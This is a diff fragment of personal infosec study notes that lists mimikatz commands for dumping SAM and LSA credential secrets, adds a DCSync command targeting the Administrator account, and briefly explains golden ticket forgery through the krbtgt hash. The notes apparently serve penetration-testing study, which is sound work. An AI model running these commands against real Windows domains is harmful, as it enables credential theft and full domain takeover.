manununu/notes/infosec.md

 mimikatz # lsadump::sam
 mimikatz # lsadump::sam /patch
 mimikatz # lsadump::lsa /patch
+mimikatz # lsadump::dcsync /user:Administrator
 ```

 ### Golden Ticket Attack
+When a user submits a request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the domain.
+This secret key is actually the password hash of a domain user account called krbtgt.
+By getting the krbtgt password hash one is able to create custom TGTs (golden tickets)

 ```
 mimikatz # privilege::debug